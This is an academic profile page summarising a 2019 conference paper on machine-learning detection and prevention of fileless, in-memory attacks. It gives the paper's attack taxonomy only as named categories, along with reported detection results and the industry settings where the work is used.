Dr. Bogdan Prelipcean

Dr. Bogdan Prelipcean

PhD in Computer Science | Manager, Core Threat Protection & Intelligence at Bitdefender | Teaching Assistant at UAIC

Preventing file-less attacks with machine learning techniques

Published in 2019 21st International Symposium on Symbolic and Numeric Algorithms for Scientific Computing (SYNASC), 2019

Recommended citation: Bucevschi, Alexandru Gabriel and Balan, Gheorghe and Prelipcean, Dumitru Bogdan, "Preventing file-less attacks with machine learning techniques." 2019 21st International Symposium on Symbolic and Numeric Algorithms for Scientific Computing (SYNASC), pages 248-252, IEEE, 2019. https://doi.org/10.1109/SYNASC49474.2019.00042

Abstract

This paper presents advanced machine learning techniques specifically designed to detect and prevent file-less attacks, which represent one of the most sophisticated and evasive categories of modern cyber threats. Our approach addresses the unique challenges posed by attacks that operate entirely in memory without leaving traditional file-based artifacts.

Key Contributions

  • File-less Attack Detection: Specialized ML models for memory-based threat identification
  • Behavioral Analysis: Advanced techniques for detecting malicious in-memory activities
  • Real-time Prevention: Proactive blocking of file-less attack chains
  • Evasion Resistance: Robust detection methods resilient to advanced evasion techniques

Technical Approach

Our comprehensive methodology includes:

Memory Analysis Framework

  • Process Behavior Monitoring: Real-time analysis of process activities and memory usage patterns
  • API Call Sequences: Detection of suspicious system call patterns indicative of file-less attacks
  • Memory Artifact Analysis: Identification of malicious code injection and memory manipulation

Machine Learning Architecture

  • Feature Engineering: Extraction of behavioral and memory-based features
  • Ensemble Methods: Combination of multiple ML algorithms for improved accuracy
  • Anomaly Detection: Identification of deviations from normal system behavior
  • Deep Learning: Neural networks for complex pattern recognition in attack sequences

File-less Attack Taxonomy

Our research addresses various file-less attack types:

  • Living Off the Land: Abuse of legitimate system tools and processes
  • PowerShell Attacks: Malicious use of PowerShell for in-memory execution
  • WMI Abuse: Exploitation of Windows Management Instrumentation
  • Reflective DLL Loading: In-memory loading of malicious libraries
  • Process Hollowing: Injection of malicious code into legitimate processes

Experimental Validation

Dataset and Methodology

  • Real-world Samples: Analysis of actual file-less attack campaigns
  • Synthetic Generation: Creation of file-less attack scenarios for testing
  • Performance Metrics: Comprehensive evaluation using precision, recall, and F1-score

Results

  • Detection Accuracy: 96.3% true positive rate on file-less attack samples
  • False Positive Rate: 1.2% on benign system activities
  • Response Time: Sub-second detection and prevention capabilities
  • Memory Efficiency: Minimal performance impact on system resources

Industry Applications

This research has been successfully deployed in:

  • Endpoint Detection and Response (EDR) systems
  • Advanced Threat Protection platforms
  • Memory Forensics tools
  • Cloud Security monitoring solutions

Future Research Directions

  • AI-powered Evasion Detection: Development of AI systems to detect AI-generated evasion techniques
  • Cross-platform Coverage: Extension to Linux and macOS environments
  • IoT Security: Adaptation for resource-constrained IoT devices
  • Quantum-resistant Methods: Preparation for quantum computing threats

Industry Impact

The machine learning techniques developed in this work have been integrated into Bitdefender’s advanced threat protection systems, providing industry-leading detection capabilities against file-less attacks for millions of users worldwide.

Access paper here